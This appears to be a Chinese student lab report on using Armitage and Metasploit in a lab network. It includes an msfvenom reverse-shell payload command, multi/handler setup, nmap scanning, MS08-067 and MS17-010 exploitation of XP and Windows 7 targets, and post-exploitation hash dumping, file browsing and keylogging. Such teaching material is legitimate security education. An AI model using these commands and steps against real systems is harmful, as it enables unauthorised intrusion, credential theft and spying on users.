使用Armitage针对漏洞进行攻击

目录

注意事项

实验简介

实验目的

实验重点

实验难点

实验内容

8-1 启动Armitage

8-2 Armitage启动的三种方法

8-3 使用Armitage生成被控端和主控端

8-4 使用Armitage扫描网络

8-5 使用Armitage针对漏洞进行攻击

8-6 使用Armitage完成渗透之后的后续工作

1、利用meterpreter可完成的五类任务。

2、案例1:利用Meterpreter 1/Access/Dump Hashes菜单,盗取目标主机(英文版XP)的系统密码哈希值。

3、案例2:利用Meterpreter 1/Explore/Browse Files菜单,浏览目标主机上的文件。

4、案例3:利用Meterpreter 1/Explore/Log Keystrokes菜单,记录目标用户敲击键盘的动作。(不成功可以重启kali。中文版XP可以成功,英文版XP不成功!)

总结体会

实验心得

实验讨论


注意事项

(请注意,在进行实验之前,请务必确保你已经获得了正确的授权,并且对你的目标网络进行了合法的测试。对未经授权的网络进行攻击是非法的,并且可能导致严重的法律后果)

实验简介

Armitage是一款强大的网络攻击工具,它基于Metasploit框架,并提供了图形化用户界面,使得对漏洞进行攻击更加便捷。Armitage就是一款使用Java语言为Metasploit编写的图形化操作界面,利用它就可以轻松地使用Metasploit中的各种模块来实现自动化攻击。在本次实验,我们将会使用Armitage来演示如何使用Metasploit对目标进行攻击的完整过程,本章的实验内容包括:

  • 启动Armitage

  • 使用Armitage生成被控端和主控端使用Armitage扫描网络

  • 使用Armitage针对漏洞进行攻击

  • 使用Armitage完成渗透之后的后续工作  

实验目的

(1)掌握Armitage的三种启动方法。

(2)掌握使用Armitage生成被控端和主控端。

(3)使用Armitage扫描网络。

(4)使用Armitage针对漏洞进行攻击。

(5)使用Armitage完成渗透之后的后续工作。

实验重点

使用Armitage针对漏洞进行攻击。

实验难点

使用Armitage完成渗透之后的后续工作。

实验内容

8-1 启动Armitage

1、在安装前要更新源:

2、Armitage启动前初始化:

/etc/init.d/postgresql  start

8-2 Armitage启动的三种方法

  1. 菜单
  2. 工具栏
  3. 命令行  Armitage

8-3 使用Armitage生成被控端和主控端

  1. 1、Armitage的工作界面:
  2. (1)区域1:选择攻击载荷
  3. (2)区域2:显示目标
  4. (3)区域3:命令行控制台

2、使用Armitage生成如下命令(产生一个攻击载荷payload)。

  1. 输出(output)选择exe,生成payload,类似执行如下命令:

msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.124.128 lport=5000 -f exe -o/root/payload.exe

2. 输出(output)选择multi/handler,则生成控制端,类似执行如下命令:

msfconsole

useexploit/multi/handler

setpayload windows/meterpreter/reverse_tcp

setlhost 192.168.124.128

setlport 5000

exploit

I:复制文件到网站主目录:

II:启动apache2并检查:

III:在目标靶机下载被控端文件:

IV:运行文件:

V:返回控制端查看是否获取会话:

8-4 使用Armitage扫描网络

在Armitage使用nmap扫描工具,使用图形化的nmap扫描本地网段,网段号  192.168.124.0/24

(1)选择“Hosts/Nmap Scan/Quick Scan(OS detest) ”菜单

(相当于命令:nmap --min-hostgroup 96 -sV -n -T4 -O -F --version-light 192.168.152.0/24)

选择快速扫描方式。

(2)输入扫描的网段:

(3)扫描到的目标:

8-5 使用Armitage针对漏洞进行攻击

1、利用XP系统ms08_067漏洞对XP系统进行渗透。目标靶机:英文版XP,IP 192.168.124.129

(1)通过输入关键字(ms08_067)选择攻击模块,双击模块名称,在弹出的窗口中输入目标靶机的IP地址,勾选“Use a reverse connection”(反向连接)。

(2)单击“Launch”按钮,攻击完成,查看是否建立会话:(注意:必须先停止apache,因为apache使用445端口,与该命令也使用445端口发生冲突!)

2、利用win7系统ms17_010漏洞对win7系统进行渗透。

目标靶机:永恒之蓝靶机,IP  192.168.124.132

(1)通过输入关键字(ms17_010)选择攻击模块,双击模块名称,在弹出的窗口中输入目标靶机的IP地址,勾选“Use a reverse connection”(反向连接)。

(2)单击“Launch”按钮,攻击完成,查看是否建立会话:

8-6 使用Armitage完成渗透之后的后续工作

1、利用meterpreter可完成的五类任务。
  1. Access:跟系统权限有关,如查看系统哈希值、盗取令牌、提升权限等。
  2. Interact:打开一个用于远程控制的命令,如系统命令行、Meterpreter命令等
  3. Explore:渗透,如浏览系统文件、显示进程、监视键盘、截图、控制摄像头等。
  4. Pivoting:将主机设置成为跳板。
  5. ARP Scan:利用目标主机对目标网络进行扫描。
  6. 2、案例1:利用Meterpreter 1/Access/Dump Hashes菜单,盗取目标主机(英文版XP)的系统密码哈希值。

3、案例2:利用Meterpreter 1/Explore/Browse Files菜单,浏览目标主机上的文件。

4、案例3:利用Meterpreter 1/Explore/Log Keystrokes菜单,记录目标用户敲击键盘的动作。(不成功可以重启kali。中文版XP可以成功,英文版XP不成功!)

I:启动键盘监听器:

II:启动后弹出的窗口:

III:目标靶机运行输入打开记事本:

IV:在记事本中打点内容用于测试:

V:返回控制端可以看到所打内容已被监听:

总结体会

  1. 熟悉工具:在进行实验之前,首先要对Armitage工具进行充分的学习和了解。了解其各个功能和模块的作用,掌握其基本操作和使用方法,这样才能更好地进行实验。

  2. 选择目标:在实验中,选择目标是至关重要的一步。要选择一个合适的目标,可以是自己搭建的虚拟机环境,也可以是其他网络中的主机。目标的选择要考虑到漏洞的种类和目标主机的系统环境等因素。

  3. 攻击策略:在实验中,要制定合适的攻击策略。根据目标的情况,选择合适的漏洞进行攻击,尝试不同的方法和技术,以获取对目标主机的访问权限。

  4. 安全意识:在进行漏洞攻击实验时,一定要保持安全意识。要明确实验的目的和范围,不要进行未经授权的攻击行为,避免对他人网络造成不必要的影响和损害。

  5. 实验总结:在实验结束后,要及时总结实验过程和结果。分析实验中遇到的问题和困难,总结经验教训,进一步完善和提升自己的攻击技术。

实验心得

使用Armitage进行漏洞攻击实验是一项复杂而且有挑战性的任务,对知识和技能提出了很高的要求。我意识到自己需要不断学习和提升自己的能力,以便能够适应这个项目的需求。要充分准备和学习,并注重安全意识,才能取得良好的实验效果。同时,要保持对法律和道德规范的遵守,合法合规地进行实验。总的来说,此次实验对我来说是一次非常宝贵的经历。通过参与实验,我不仅学到了专业知识和技能,还提高了合作、沟通、时间管理和问题解决的能力。这些经验和教训将对我今后的学习和工作产生积极的影响。

实验讨论

  1. Armitage主要功能是什么?使用它可以完成哪些工作?
  2. 利用Armitage扫描之后发现的活跃主机中,以下IP的主机指哪些特殊主机:192.168.*.1、192.168.*.2、192.168.*.254?

评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值